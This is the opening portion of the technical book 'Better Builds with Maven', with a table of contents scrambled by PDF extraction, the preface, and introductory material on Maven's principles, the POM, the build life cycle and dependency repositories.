Maven’s Principles 1. Using Project Inheritance 3.1. Coherent Organization of Dependencies Local Maven repository Locating dependency artifacts 22 22 23 24 25 26 27 27 28 28 28 31 32 34 1. Packaging and Installation to Your Local Repository 2. Creating Applications with Maven 38 39 40 42 44 46 48 49 52 53 54 55 3.2. Using Snapshots 3.6. Resolving Dependency Conflicts and Using Version Ranges 3.2.2.4.1.2. Using Maven Plugins 2. Convention Over Configuration Standard Directory Layout for Projects One Primary Output Per Project Standard Naming Conventions 1. Reuse of Build Logic Maven's project object model (POM) 1. Handling Classpath Resources 2.3.8. What is Maven? 1.1.1.3. Preventing Filtering of Binary Resources 2.6.1.4.1. Maven's Origins 1. Compiling Application Sources 2.1. Maven Overview 1. Introducing Maven 17 21 1. Setting Up an Application Directory Structure 3.1.2. Introduction 3. Getting Started with Maven 35 37 2. Summary 3. What Does Maven Provide? 1.3. Utilizing the Build Life Cycle 3. Creating Your First Maven Project 2. Compiling Test Sources and Running Unit Tests 2.5.5.2. Filtering Classpath Resources 2.1.2.3.6.6.Table of Contents Preface 1.3.8. Handling Test Classpath Resources 2. Maven's Benefits 2.2.2. Preparing to Use Maven 2.6.7. Using Profiles 56 56 59 61 64 65 69 70 9 .3.7. Managing Dependencies 3.
Bootstrapping into Plugin Development 5. Summary 5.9. Deploying with SSH2 3. Building a Web Application Project 4.2. Building J2EE Applications 74 74 75 75 76 77 78 84 85 4. Introduction 4.3.9. Deploying with an External SSH 3. Deploying with FTP 3.11. Introduction 5.9. Plugin Development Tools Choose your mojo implementation language 5. Deploying Web Applications 4. Deploying with SFTP 3. Improving Web Development Productivity 4.3.2.2.4.1. Deploying to the File System 3.3.9.10. BuildInfo Example: Notifying Other Developers with an Ant Mojo The Ant target The mojo metadata file 141 141 141 142 142 145 146 147 148 148 149 10 .5. Testing J2EE Application 4.4.13.14.3. Deploying a J2EE Application 4.9.3. Developing Custom Maven Plugins 86 86 87 91 95 100 103 105 108 114 117 122 126 132 133 5.11.3. Deploying EJBs 4.3. BuildInfo Example: Capturing Information with a Java Mojo Prerequisite: Building the buildinfo generator project Using the archetype plugin to generate a stub plugin project The mojo The plugin POM Binding to the life cycle The output 5. Organizing the DayTrader Directory Structure 4.2. Introducing the DayTrader Application 4.1. Building an EAR Project 4.6.3.10.4. Creating a Web Site for your Application 3.12.9.5.9. Deploying your Application 3.1.7.2. The Plugin Framework Participation in the build life cycle Accessing build information The plugin descriptor 5. Summary 4.1. Building a Web Services Client Project 4. Building an EJB Project 4.4.1. Developing Your First Mojo 5.4. A Review of Plugin Terminology 5. A Note on the Examples in this Chapter 134 134 135 135 136 137 137 138 140 140 5.8. Building an EJB Module With Xdoclet 4.
3.5. Accessing Project Sources and Resources Adding a source directory to the build Adding a resource to the build Accessing the source-root list Accessing the resource list Note on testing source-roots and resources 5.2. Summary 6.8. Advanced Mojo Development 5.2. Monitoring and Improving the Health of Your Releases 6.9.7.12. Monitoring and Improving the Health of Your Source Code 6. What Does Maven Have to do With Project Health? 6. Attaching Artifacts for Installation and Deployment 153 153 154 154 155 156 157 158 159 160 161 163 163 5. Creating a Standard Project Archetype 7. Assessing Project Health with Maven 165 167 6.1.1. The Issues Facing Teams 7.6.2.5.2.5. Cutting a Release 7. Creating a Shared Repository 7. Adding Reports to the Project Web site 6.7. Summary 8.5. Summary 7. Separating Developer Reports From User Documentation 6.5.1. Creating POM files 242 242 244 250 11 .3. Viewing Overall Project Health 6.9.Modifying the plugin POM for Ant mojos Binding the notify mojo to the life cycle 150 152 5. Where to Begin? 8. Creating Reference Material 6. Introduction 8.8.1.4.6.11.1. Introducing the Spring Framework 8. Choosing Which Reports to Include 6.4.3. Continuous Integration with Continuum 7. Creating an Organization POM 7. Team Collaboration with Maven 168 169 171 174 180 182 186 194 199 202 206 206 207 7.6.4. Monitoring and Improving the Health of Your Dependencies 6.5. Migrating to Maven 208 209 212 215 218 228 233 236 240 241 8.1. Accessing Project Dependencies Injecting the project dependency set Requiring dependency resolution BuildInfo example: logging dependency versions 5. Configuration of Reports 6.5. Gaining Access to Maven APIs 5. How to Set up a Consistent Developer Environment 7.3. Monitoring and Improving the Health of Your Tests 6.10. Team Dependency Management Using Snapshots 7.
Ant Metadata Syntax Appendix B: Standard Conventions 272 272 273 273 274 274 278 278 279 279 283 B.2. Using Ant Tasks From Inside Maven 8.6. Mojo Parameter Expressions A. The site Life Cycle Life-cycle phases Default Life Cycle Bindings 266 266 266 268 269 270 270 270 271 271 271 A. Compiling Tests 8.7. Some Special Cases 8.6.2.6.3. The default Life Cycle Life-cycle phases Bindings for the jar packaging Bindings for the maven-plugin packaging A.5.8.2.2. Standard Directory Structure B.5.1.1.4.2. Testing 8. Summary Appendix A: Resources for Plugin Developers 250 254 254 256 257 257 258 258 261 263 263 264 264 265 A.4. Running Tests 8. Building Java 5 Classes 8. Complex Expression Roots A.2. Restructuring the Code 8. Other Modules 8.1.2.5.1. Maven’s Super POM B. Non-redistributable Jars 8.1. Compiling 8.2.1.6.6. Java Mojo Metadata: Supported Javadoc Annotations Class-level annotations Field-level annotations A.8.6.1.2. Referring to Test Classes from Other Modules 8.3. Maven’s Default Build Life Cycle Bibliography Index 284 285 286 287 289 12 . Simple Expressions A. The clean Life Cycle Life-cycle phases Default life-cycle bindings A. Avoiding Duplication 8.1.1.2.4.3.2. Maven's Life Cycles A. The Expression Resolution Algorithm Plugin metadata Plugin descriptor syntax A.6.5.5.6.
this guide is written to provide a quick solution for the need at hand.Preface Preface Welcome to Better Builds with Maven. Maven 2 is a product that offers immediate value to many users and organizations. For first time users. Perhaps. it is recommended that you step through the material in a sequential fashion. but Maven shines in helping teams operate more effectively by allowing team members to focus on what the stakeholders of a project require -leaving the build infrastructure to Maven! This guide is not meant to be an in-depth and comprehensive resource but rather an introduction. 17 . This guide is intended for Java developers who wish to implement the project management and comprehension capabilities of Maven 2 and use it to make their day-to-day work easier and to get help with the comprehension of any Java-based project. As you will soon find.x). For users more familiar with Maven (including Maven 1. Maven works equally well for small and large projects.0. an indispensable guide to understand and use Maven 2. reading this book will take you longer. which provides a wide range of topics from understanding Maven's build platform to programming nuances. We hope that this book will be useful for Java project managers as well. it does not take long to realize these benefits.
Finally. From there. discusses Maven's monitoring tools. Introducing Maven. and install those JARs in your local repository using Maven. and document for reuse the artifacts that result from a software project. including a review of plugin terminology and the basic mechanics of the Maven plugin framework. After reading this second chapter. At the same time. Chapter 7. Chapter 3 builds on that and shows you how to build a real-world project. looks at Maven as a set of practices and tools that enable effective team communication and collaboration. illustrates Maven's best practices and advanced uses by working on a real-world example application. Web Services). you will be revisiting the Proficio application that was developed in Chapter 3. you will be able to keep your current build working. In this chapter. compiling and packaging your first project. goes through the background and philosophy behind Maven and defines what Maven is. EAR. In this chapter you will learn to set up the directory structure for a typical application and the basics of managing an application's development with Maven. Creating Applications with Maven. These tools aid the team to organize. Assessing Project Health with Maven. the chapter covers the tools available to simplify the life of the plugin developer. Chapter 6 discusses project monitoring issues and reporting. After reading this chapter. Team Collaboration with Maven. Building J2EE Applications. Chapter 7 discusses using Maven in a team development environment. reporting tools. create JARs. explains a migration path from an existing build in Ant to Maven. you will be able to take an existing Ant-based build. Chapter 1. how to use Maven to build J2EE archives (JAR. Chapter 6. Migrating to Maven. they discuss what Maven is and get you started with your first Maven project. it discusses the various ways that a plugin can interact with the Maven build environment and explores some examples.Better Builds with Maven Organization The first two chapters of the book are geared toward a new user of Maven 2. Chapter 2. At this stage you'll pretty much become an expert Maven user. Chapter 3. and how to use Maven to generate a Web site for your project. Chapter 8. Chapter 5. and how to use Maven to deploy J2EE archives to a container. You will learn how to use Maven to ensure successful team development. shows how to create the build for a full-fledged J2EE application. focuses on the task of writing custom plugins. Chapter 4. and learning more about the health of the project. and Chapter 8 shows you how to migrate Ant builds to Maven. Chapter 4 shows you how to build and deploy a J2EE application. EJB. Chapter 5 focuses on developing plugins for Maven. compile and test the code. It starts by describing fundamentals. Getting Started with Maven. Developing Custom Maven Plugins. WAR. 18 . split it into modular components if needed. visualize. gives detailed instructions on creating. you should be up and running with Maven.
Once at the site. so occasionally something will come up that none of us caught prior to publication. go to. post an update to the book’s errata page and fix the problem in subsequent editions of the book.com and locate the View Book Errata link.mergere.com. On this page you will be able to view all errata that have been submitted for this book and posted by Maven editors. We offer source code for download. 19 .mergere. click the Get Sample Code link to obtain the source code for the book. However. You can also click the Submit Errata link to notify us of any errors that you might have found. We’ll check the information and.0 installed.Preface Errata We have made every effort to ensure that there are no errors in the text or in the code.com. if appropriate. So if you have Maven 2. errata. How to Contact Us We want to hear about any errors you find in this book.mergere. and technical support from the Mergere Web site at. we are human. Simply email the information to community@mergere. then you're ready to go. How to Download the Source Code All of the source code used in this book is available for download at. To find the errata page for this book.com.
Better Builds with Maven This page left intentionally blank. 20 .. but not any simpler. .Albert Einstein 21 .
Better Builds with Maven 1. to view it in such limited terms is akin to saying that a web browser is nothing more than a tool that reads hypertext. What is Maven? Maven is a project management framework. While you are free to use Maven as “just another build tool”. and software. “Well.” 22 . distribution. This book focuses on the core tool produced by the Maven project. but the term project management framework is a meaningless abstraction that doesn't do justice to the richness and complexity of Maven. and deploying project artifacts. In addition to solving straightforward. testing. 1 You can tell your manager: “Maven is a declarative project management tool that decreases your overall time to market by effectively leveraging cross-project intelligence. It simultaneously reduces your duplication effort and leads to higher code quality . they expect a short. it will prime you for the concepts that are to follow. to distribution. Maven also brings with it some compelling second-order benefits. It is a combination of ideas. sound-bite answer. Perhaps you picked up this book because someone told you that Maven is a build tool. Maven 2. you can stop reading now and skip to Chapter 2. what exactly is Maven? Maven encompasses a set of build standards. From compilation. richer definition of Maven read this introduction. standards. and with repetition phrases such as project management and enterprise software start to lose concrete meaning. It provides a framework that enables easy reuse of common build logic for all projects following Maven's standards. Don't worry.1. Revolutionary ideas are often difficult to convey with words.. uninspiring words. to team collaboration. and many developers who have approached Maven as another build tool have come away with a finely tuned build system. Maven provides the necessary abstractions that encourage reuse and take much of the work out of project builds. 1. first-order problems such as simplifying builds. but this doesn't tell you much about Maven. So. It defines a standard life cycle for building. Maven Overview Maven provides a comprehensive approach to managing software projects. and the technologies related to the Maven project. If you are reading this introduction just to find something to tell your manager1. Maven can be the build tool you need. When someone wants to know what Maven is. it is a build tool or a scripting framework. to documentation. a framework that greatly simplifies the process of managing a software project. are beginning to have a transformative effect on the Java community.1. an artifact repository model. If you are interested in a fuller. Too often technologists rely on abstract phrases to capture complex topics in three or four words. It's the most obvious three-word definition of Maven the authors could come up with.1. You may have been expecting a more straightforward answer. and the deployment process.” Maven is more than three boring. documentation. Maven.
The build process for Tomcat was different than the build process for Struts. distribution. While there were some common themes across the separate builds. the barrier to entry was extremely high. Maven entered the scene by way of the Turbine project. as much as it is a piece of software. generating documentation. common build strategies. for a project with a difficult build system.Introducing Maven As more and more projects and products adopt Maven as a foundation for project management.2. to answer the original question: Maven is many things to many people. Developers at the ASF stopped figuring out creative ways to compile. Prior to Maven. and package software. developers were building yet another build system. Soon after the creation of Maven other projects. and Web site generation. each community was creating its own build systems and there was no reuse of build logic across projects. Instead of focusing on creating good component libraries or MVC frameworks. predictable way. In addition. Once you get up to speed on the fundamentals of Maven. started focusing on component development. and instead. Ultimately. 1. this copy and paste approach to build reuse reached a critical tipping point at which the amount of work required to maintain the collection of build systems was distracting from the central task of developing high-quality software. they did not have to go through the process again when they moved on to the next project. If you followed the Maven Build Life Cycle. Maven provides standards and a set of patterns in order to facilitate project management through reusable. This lack of a common approach to building software meant that every new project tended to copy and paste another project's build system. So. Maven is a way of approaching a set of software as a collection of highly-interdependent components. The same standards extended to testing. Using Maven has made it easier to add external dependencies and publish your own project components. Whereas Ant provides a toolbox for scripting builds. your project gained a build by default. it becomes easier to understand the relationships between projects and to establish a system that navigates and reports on these relationships. test. Maven is not just a build tool. and deploying. The ASF was effectively a series of isolated islands of innovation. and not necessarily a replacement for Ant.1. you will wonder how you ever developed without it. It is a set of standards and an approach to project development. and the Turbine developers had a different site generation process than the Jakarta Commons developers. Maven's Origins Maven was borne of the practical desire to make several projects at the Apache Software Foundation (ASF) work in the same. which can be described in a common format. projects such as Jakarta Taglibs had (and continue to have) a tough time attracting developer interest because it could take an hour to configure everything in just the right way. generating metrics and reports. and it immediately sparked interest as a sort of Rosetta Stone for software project management. Many people come to Maven familiar with Ant. knowing clearly how they all worked just by understanding how one of the components worked. so it's a natural association. but Maven is an entirely different creature from Ant. Developers within the Turbine project could freely move between subcomponents. Once developers spent time learning how one project was built. 23 . 
Maven's standard formats enable a sort of "Semantic Web" for programming projects. It is the next step in the evolution of how individuals and organizations collaborate to create software systems. Maven's standards and centralized repository model offer an easy-touse naming system for projects. such as Jakarta Commons. every project at the ASF had a different approach to compilation. the Codehaus community started to adopt Maven 1 as a foundation for project management.
more reusable. 1. install) is effectively delegated to the POM and the appropriate plugins. to provide a common layout for project documentation. if your project currently relies on an existing Ant build script that must be maintained.3. The key value to developers from Maven is that it takes a declarative approach rather than requiring developers to create the build process themselves. if you've learned how to drive a Jeep. assemble. What Does Maven Provide? Maven provides a useful abstraction for building software in the same way an automobile provides an abstraction for driving. Maven takes a similar approach to software projects: if you can build one Maven project you can build them all. Maven provides you with: • A comprehensive model for software projects • Tools that interact with this declarative model Maven provides a comprehensive model that can be applied to all software projects. and much more transparent. An individual Maven project's structure and contents are declared in a Project Object Model (POM). and if you can apply a testing plugin to one project. in order to perform the build. Much of the project management and build orchestration (compile. and output. documentation. and you gain access to expertise and best-practices of an entire industry. more maintainable. which forms the basis of the entire Maven system. declarative build approach tend to be more transparent. existing Ant scripts (or Make files) can be complementary to Maven and used through Maven's plugin architecture. You describe your project using Maven's model. 24 . you can apply it to all projects. and to retrieve project dependencies from a shared storage area makes the building process much less time consuming. and easier to comprehend.1. Plugins allow developers to call existing Ant scripts and Make files and incorporate those existing functions into the Maven build life cycle. the car provides a known interface. referred to as "building the build". test. Projects and systems that use Maven's standard. Maven allows developers to declare life-cycle goals and project dependencies that rely on Maven’s default structures and plugin capabilities. you can easily drive a Camry. When you purchase a new car. Developers can build any given project without having to understand how the individual plugins work (scripts in the Ant world). and the software tool (named Maven) is just a supporting element within this model.Better Builds with Maven However. Maven’s ability to standardize locations for source files. Given the highly inter-dependent nature of projects in open source. The model uses a common project “language”.
it is improbable that multiple individuals can work productively together on a project. when code is not reused it is very hard to create a maintainable system. and focus on building the application. You will see these principles in action in the following chapter. • • • Without these advantages. but also for software components.Organizations that adopt Maven can stop “building the build”. there is little chance anyone is going to comprehend the project as a whole.Maven is built upon a foundation of reuse. Maven projects are more maintainable because they follow a common. 25 .Maven allows organizations to standardize on a set of best practices. Without visibility it is unlikely one individual will know what another has accomplished and it is likely that useful code will not be reused. As mentioned earlier. and aesthetically consistent relation of parts. home-grown build systems. When you adopt Maven you are effectively reusing the best practices of an entire industry. along with a commensurate degree of frustration among team members. This is a natural effect when processes don't work the same way for everyone. when you create your first Maven project. Further.Maven lowers the barrier to reuse not only for build logic. The definition of this term from the American Heritage dictionary captures the meaning perfectly: “Marked by an orderly. Each of the principles above enables developers to describe their projects at a higher level of abstraction. logical. Developers can jump between different projects without the steep learning curve that accompanies custom. publicly-defined model. 1. Agility .2. Because Maven projects adhere to a standard model they are less opaque. Maven’s Principles According to Christopher Alexander "patterns help create a shared language for communicating insight and experience about problems and their solutions". Maven makes it is easier to create a component and then integrate it into a multi-project build. Maintainability .“ Reusability . This chapter will examine each of these principles in detail.Introducing Maven Organizations and projects that adopt Maven benefit from: • Coherence . Maven provides a structured build life cycle so that problems can be approached in terms of this structure. The following Maven principles were inspired by Christopher Alexander's idea of creating a shared language: • Convention over configuration • Declarative execution • Reuse of build logic • Coherent organization of dependencies Maven provides a shared language for software development projects. allowing more effective communication and freeing team members to get on with the important work of creating value at the application level. When everyone is constantly searching to find all the different bits and pieces that make up a project. As a result you end up with a lack of shared knowledge.
or deploying. the notion that we should try to accommodate as many approaches as possible. makes it easier to communicate to others. and allows you to create value in your applications faster with less effort. Convention Over Configuration One of the central tenets of Maven is to provide sensible default strategies for the most common tasks. With Maven you slot the various pieces in where it asks and Maven will take care of almost all of the mundane aspects for you.2. you gain an immense reward in terms of productivity that allows you to do more. Rails does. which all add up to make a huge difference in daily use. This is not to say that you can't override Maven's defaults. One characteristic of opinionated software is the notion of 'convention over configuration'. The class automatically knows which table to use for persistence. but the use of sensible default strategies is highly encouraged.”2 David Heinemeier Hansson articulates very well what Maven has aimed to accomplish since its inception (note that David Heinemeier Hansson in no way endorses the use of Maven. Well. and I believe that's why it works. you're rewarded by not having to configure that link. that we shouldn't pass judgment on one form of development over another.Better Builds with Maven 1. sooner. All of these things should simply work. 2 O'Reilly interview with DHH 26 . If you follow basic conventions. he probably doesn't even know what Maven is and wouldn't like it if he did because it's not written in Ruby yet!): that is that you shouldn't need to spend a lot of time getting your development infrastructure functioning Using standard conventions saves time. generating documentation. One of those ideals is flexibility. such as classes are singular and tables are plural (a person class relates to a people table). you trade flexibility at the infrastructure level to gain flexibility at the application level. You don’t want to spend time fiddling with building.. so stray from these defaults when absolutely necessary only. and better at the application level. It eschews placing the old ideals of software in a primary position. so that you don't have to think about the mundane details. and this is what Maven provides. If you are happy to work along the golden path that I've embedded in Rails. With Rails.1. We have a ton of examples like that.
One Primary Output Per Project The second convention used by Maven is the concept that a single Maven project produces only one primary output. and a project for the shared utility code portion. separate projects: a project for the client portion of the application. In this scenario. the code contained in each project has a different concern (role to play) and they should be separated. Maven pushes you to think clearly about the separation of concerns when setting up your projects because modularity leads to reuse. but. If you have placed all the sources together in a single project. but you can also take a look in Appendix B for a full listing of the standard conventions. server code. You will be able to look at other projects and immediately understand the project layout. extendibility and reusability.consider a set of sources for a client/server-based application that contains client code. It is a very simple idea but it can save you a lot of time. when you do this. The separation of concerns (SoC) principle states that a given problem involves different kinds of concerns. makes it much easier to reuse. the boundaries between our three separate concerns can easily become blurred and the ability to reuse the utility code could prove to be difficult. you need to ask yourself if the extra configuration that comes with customization is really worth it. To illustrate. and documentation. If you do have a choice then why not harness the collective knowledge that has built up as a result of using this convention? You will see clear examples of the standard directory structure in the next chapter. These components are generally referred to as project content. maintainability. First time users often complain about Maven forcing you to do things a certain way and the formalization of the directory structure is the source of most of the complaints. you will be able to navigate within any Maven project you build in the future. project resources. Follow the standard directory layout. Having the utility code in a separate project (a separate JAR file).Introducing Maven Standard Directory Layout for Projects The first convention used by Maven is a standard directory layout for project sources. default locations. In this case. even if you only look at a few new projects a year that's time better spent on your application. but Maven would encourage you to have three. you will be able to adapt your project to your customized layout at a cost. which should be identified and separated to cope with complexity and to achieve the required engineering quality factors such as adaptability. increased complexity of your project's POM. If this saves you 30 minutes for each new project you look at. Maven encourages a common arrangement of project content so that once you are familiar with these standard. and you will make it easier to communicate about your project. You can override any of Maven's defaults to create a directory layout of your choosing. 27 . If you have no choice in the matter due to organizational policy or integration issues with existing systems. and shared utility code. You could produce a single JAR file which includes all the compiled classes. you might be forced to use a directory structure that diverges from Maven's defaults. configuration files. generated output. a project for the server portion of the application.
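As a rough sketch of what that three-way split could look like in practice (the module and artifact names here are hypothetical, and managing interdependent projects like this is covered properly later in the book), a parent POM simply lists each concern as a module, and each module then produces its own single artifact:

<project>
  <modelVersion>4.0.0</modelVersion>
  <groupId>com.mycompany.app</groupId>
  <artifactId>app-parent</artifactId>
  <packaging>pom</packaging>
  <version>1.0-SNAPSHOT</version>
  <!-- one module per concern: client, server, and shared utility code -->
  <modules>
    <module>app-client</module>
    <module>app-server</module>
    <module>app-util</module>
  </modules>
</project>

The client and server modules can then declare a normal dependency on app-util, which is exactly what makes the utility code reusable on its own.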
It is the POM that drives execution in Maven and this approach can be described as model-driven or declarative execution. It's happened to all of us.2 of Commons Logging. The intent behind the standard naming conventions employed by Maven is that it lets you understand exactly what you are looking at by.the POM is Maven's currency. Maven can be thought of as a framework that coordinates the execution of plugins in a well defined way. because the naming convention keeps each one separate in a logical. but with Maven. is the use of a standard naming convention for directories and for the primary output of each project. well. The naming conventions provide clarity and immediate comprehension. Even from this short list of examples you can see that a plugin in Maven has a very specific role to play in the grand scheme of things. Reuse of Build Logic As you have already learned. you would not even be able to get the information from the jar's manifest. The execution of Maven's plugins is coordinated by Maven's build life cycle in a declarative fashion with instructions from Maven's POM. and many other functions. a plugin for creating Javadocs. which results because the wrong version of a JAR file was used. a plugin for creating JARs.2. in a lot of cases. Maven is useless .2.jar. easily comprehensible manner. and the POM is Maven's description of a single project. It is immediately obvious that this is version 1. Systems that cannot cope with information rich artifacts like commons-logging-1. It doesn't make much sense to exclude pertinent information when you can have it at hand to use. when something is misplaced. Declarative Execution Everything in Maven is driven in a declarative fashion using Maven's Project Object Model (POM) and specifically. the plugin configurations contained in the POM. Moreover. a set of conventions really. you'll track it down to a ClassNotFound exception. Maven's project object model (POM) Maven is project-centric by design. 28 . A simple example of a standard naming convention might be commons-logging-1. later in this chapter.2. This is important if there are multiple subprojects involved in a build process. One important concept to keep in mind is that everything accomplished in Maven is the result of a plugin executing. Maven puts this SoC principle into practice by encapsulating build logic into coherent modules called plugins. looking at it.Better Builds with Maven Standard Naming Conventions The third convention in Maven. This is illustrated in the Coherent Organization of Dependencies section. If the JAR were named commonslogging. and it doesn't have to happen again.2. 1. In Maven there is a plugin for compiling source code.jar you would not really have any idea of the version of Commons Logging. Maven promotes reuse by encouraging a separation of concerns . a plugin for running tests. Without the POM.jar are inherently flawed because eventually. Plugins are the key building blocks for everything in Maven.
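Since everything Maven does is a plugin goal under the covers, it can help to see two invocations side by side; this is only an illustration using the standard compiler plugin, and the life-cycle phases themselves are described shortly:

mvn compile
mvn compiler:compile

The first command runs the build life cycle up to the compile phase, and it is the life cycle that calls the compiler plugin's compile goal; the second command invokes that same goal directly, bypassing the life cycle. Either way, the work is done by a plugin.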
maven. The answer lies in Maven's implicit use of its Super POM.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.This element indicates the unique identifier of the organization or group that created the project. For example org.lang. The POM is an XML document and looks like the following (very) simplified example: <project> <modelVersion>4. The key feature to remember is the Super POM contains important default information so you don't have to repeat this information in the POMs you create.Object.apache. In Java.Introducing Maven The POM below is an example of what you could use to build and test a project.xml files. myapp-1. • groupId . Maven's Super POM carries with it all the default conventions that Maven encourages.<extension> (for example. You.0</modelVersion> <groupId>com. The POM contains every important piece of information about your project. Likewise.0-SNAPSHOT</version> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.lang.1</version> <scope>test</scope> </dependency> </dependencies> </project> This POM will allow you to compile.This element indicates the unique base name of the primary artifact being generated by this project.This required element indicates the version of the object model that the POM is using. Additional artifacts such as source bundles also use the artifactId as part of their file name.0.0.mycompany. but still displays the key elements that every POM contains.Object class. • • project . will ask “How this is possible using a 15 line file?”. The groupId is one of the key identifiers of a project and is typically based on the fully qualified domain name of your organization.jar). and is the analog of the Java language's java.8. so if you wish to find out more about it you can refer to Appendix B. The version of the model itself changes very infrequently. being the observant reader. but it is mandatory in order to ensure stability when Maven introduces new features or other model changes. in Maven all POMs have an implicit parent in Maven's Super POM. and generate basic documentation. 29 . The Super POM can be rather intimidating at first glance. The POM shown previously is a very simple POM.This is the top-level element in all Maven pom. modelVersion .plugins is the designated groupId for all Maven plugins. A typical artifact produced by Maven would have the form <artifactId>-<version>. • artifactId . all objects have the implicit parent of java. test.
or other projects that use it as a dependency. Maven plugins provide reusable build logic that can be slotted into the standard build life cycle. The default value for the packaging element is jar so you do not have to specify this in most cases. or test. generate-sources.This element indicates where the project's site can be found. which indicates that a project is in a state of development. So. if you tell Maven to compile. For a complete reference of the elements available for use in the POM please refer to the POM reference at element indicates the version of the artifact generated by the project. In Maven.apache.This element indicates the package type to be used by this artifact (JAR. testing. or package. For example. etc. For example. installation. • • url . packaging. Any time you need to customize the way your project builds you either use an existing plugin. EAR. For now. and during the build process for your project. process-sources.html. Maven goes a long way to help you with version management and you will often see the SNAPSHOT designator in a version. well-trodden build paths: preparation. The standard build life cycle consists of many phases and these can be thought of as extension points. related to that phase. WAR. This not only means that the artifact produced is a JAR. or create a custom plugin for the task at hand.This element provides a basic description of your project. just keep in mind that the selected packaging of a project plays a part in customizing the build life cycle. This is often used in Maven's generated documentation. but also indicates a specific life cycle to use as part of the build process. or goals. The actions that have to be performed are stated at a high level.7 Using Maven Plugins and Chapter 5 Developing Custom Maven Plugins for examples and details on how to customize the Maven build. It is important to note that each phase in the life cycle will be executed up to and including the phase you specify. When you need to add some functionality to the build life cycle you do so with a plugin. The path that Maven moves along to accommodate an infinite variety of projects is called the build life cycle. or install. description .). or EAR. and Maven deals with the details behind the scenes. See Chapter 2. Maven's Build Life Cycle Software projects generally follow similar.This element indicates the display name used for the project.Better Builds with Maven • packaging .org/maven-model/maven. WAR. and compile phases that precede it automatically. etc. compilation. In Maven you do day-to-day work by invoking particular phases in this standard build life cycle. initialize. version . the compile phase invokes a certain set of goals to compile a set of classes. generate-resources. The life cycle is a topic dealt with later in this chapter. • • name . the build life cycle consists of a series of phases where each phase can perform one or more actions. you tell Maven that you want to compile. Maven will execute the validate. 30 .
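As a quick illustration of that rule (the exact goals executed depend on the project's packaging, so treat this as a sketch rather than a complete trace), asking for the package phase on a JAR project implies everything before it:

mvn package

Maven will, roughly, validate the project, generate and process any sources and resources, compile the main code, compile and run the unit tests, and only then build the JAR. You never list those steps yourself; you simply name the phase you want to reach.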
Maven tries to satisfy that dependency by looking in all of the remote repositories to which it has access. we can describe the process of dependency management as Maven reaching out into the world.app</groupId> <artifactId>my-app</artifactId> <packaging>jar</packaging> <version>1.3. artifactId and version. or EAR file.1</version> <scope>test</scope> </dependency> </dependencies> </project> This POM states that your project has a dependency on JUnit. In Java. If you recall. In the POM you are not specifically telling Maven where the dependencies are physically located. instead you deal with logical dependencies.8.mycompany. but you may be asking yourself “Where does that dependency come from?” and “Where is the JAR?” The answers to those questions are not readily apparent without some explanation of how Maven's dependencies.8. which is straightforward. grabbing a dependency. you are simply telling Maven what a specific project expects. SAR. artifacts and repositories work. A dependency is uniquely identified by the following identifiers: groupId. There is more going on behind the scenes. in order to find the artifacts that most closely match the dependency request. In “Maven-speak” an artifact is a specific piece of software. but a Java artifact could also be a WAR. instead it depends on version 3. Your project doesn't require junit-3.1 of the junit artifact produced by the junit group.8. but the key concept is that Maven dependencies are declarative. you stop focusing on a collection of JAR files. and it supplies these coordinates to its own internal dependency mechanisms. With Maven. Coherent Organization of Dependencies We are now going to delve into how Maven resolves dependencies and discuss the intimately connected concepts of dependencies. A dependency is a reference to a specific artifact that resides in a repository. Dependency Management is one of the most powerful features in Maven. In order for Maven to attempt to satisfy a dependency.0-SNAPSHOT</version> <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. artifacts. 31 . At a basic level. and providing this dependency to your software project. When a dependency is declared within the context of your project. Maven needs to know what repository to search as well as the dependency's coordinates.0. the most common artifact is a JAR file.0</modelVersion> <groupId>com.1.2.jar. Maven takes the dependency coordinates you provide in the POM.Introducing Maven 1. and repositories. If a matching artifact is located. Maven transports it from that remote repository to your local repository for project use. our example POM has a single dependency listed for Junit: <project> <modelVersion>4.
Maven has two types of repositories: local and remote. Maven usually interacts with your local repository, but when a declared dependency is not present in your local repository, Maven searches all the remote repositories to which it has access to find what's missing. Read the following sections for specific details regarding where Maven searches for these dependencies.

Local Maven repository

When you install and run Maven for the first time, it will create your local repository and populate it with artifacts as a result of dependency requests. You must have a local repository in order for Maven to work. By default, Maven creates your local repository in ~/.m2/repository. The following folder structure shows the layout of a local Maven repository that has a few locally installed dependency artifacts such as junit-3.8.1.jar:
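The book shows that listing as a screenshot; as a rough, illustrative sketch only (not the book's exact figure), a local repository containing the JUnit artifact would look something like this, and, should you ever need to, the location can be moved with the optional localRepository element of settings.xml (the D:/mvn-repo path below is purely hypothetical):

~/.m2/repository/
    junit/
        junit/
            3.8.1/
                junit-3.8.1.jar
                junit-3.8.1.pom

<settings>
  <!-- optional: store the local repository somewhere other than ~/.m2/repository -->
  <localRepository>D:/mvn-repo</localRepository>
</settings>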
Figure 1-1: Artifact movement from remote to local repository

Above you can see the directory structure that is created when the JUnit dependency is resolved. So that you understand how the layout works, take a closer look at one of the artifacts that appeared in your local repository. We'll stick with our JUnit example and examine the junit-3.8.1.jar artifact that is now in your local repository. In theory, a repository is just an abstract storage mechanism, but in practice the repository is a directory structure in your file system. On the next page is the general pattern used to create the repository layout:
Figure 1-2: General pattern for the repository layout

If the groupId is a fully qualified domain name (something Maven encourages) such as z.y.x then you will end up with a directory structure like the following:

Figure 1-3: Sample directory structure

In the first directory listing you can see that Maven artifacts are stored in a directory structure that corresponds to Maven's groupId of org.apache.maven.

Locating dependency artifacts

When satisfying dependencies, Maven attempts to locate a dependency's artifact using the following process: first, Maven will generate a path to the artifact in your local repository; for example, Maven will attempt to find the artifact with a groupId of "junit", an artifactId of "junit", and a version of "3.8.1" in ~/.m2/repository/junit/junit/3.8.1/junit-3.8.1.jar. If this file is not present, Maven will fetch it from a remote repository.
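To make that mapping concrete, here is a small illustrative listing of how coordinates translate into local repository paths; the JUnit coordinates are the ones quoted above, and the my-app coordinates are those of the sample project used later in this book:

groupId=junit, artifactId=junit, version=3.8.1
    -> junit/junit/3.8.1/junit-3.8.1.jar

groupId=com.mycompany.app, artifactId=my-app, version=1.0-SNAPSHOT
    -> com/mycompany/app/my-app/1.0-SNAPSHOT/my-app-1.0-SNAPSHOT.jar

The dots in the groupId become directory separators, and the artifactId and version each add one more directory level.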
